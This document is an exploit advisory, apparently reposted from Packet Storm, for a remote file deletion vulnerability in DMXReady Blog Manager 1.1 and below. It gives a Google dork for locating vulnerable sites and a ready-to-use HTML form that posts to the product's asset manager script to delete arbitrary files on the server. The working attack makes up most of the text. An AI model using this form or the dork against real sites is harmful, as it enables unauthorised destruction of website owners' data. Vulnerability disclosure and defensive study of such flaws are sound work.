DMXReady Blog Manager versions 1.1 and below suffer from a remote file deletion vulnerability. DMXReady has stated that the following release addresses this security issue.
bd6e97d4c0566e7635215de09e38a21329ad7d38018fb4b4d8da6986cf99bef4*******************************************************************************
# Title : DMXReady Blog Manager <= 1.1 Remote Files Delete Vulnerability
# Author : "ajann" from Turkey
# Contact : :(
# S.Page : http://www.dmxready.com
# $$ : 199.97 $
# Dork : inurl:inc_webblogmanager.asp
# DorkEx :
http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_webblogmanager.asp&meta=
****Stop Attack ABD and ISRAEL !
*******************************************************************************
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ajann Exp</title>
</head>
<body>
<p>Delete File : )</p>
<p>Form Action: http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=</p>
<form id="form1" name="form1" method="post" action="http://target/[path]/includes/shared_scripts/wysiwyg_editor/assetmanager/assetmanager.asp?ffilter=">
<label>
<input type="hidden" name="inpCurrFolder" value="" />
</label>
<p>
<label>
Delete File Path:
<input type="text" name="inpFileToDelete" value="/shots/index.asp">
</label>
etc..
</p>
<p>
<label>
<input type="submit" name="ff" id="ff" value="Submit" />
</label>
</p>
</form>
<p><br />
</p>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed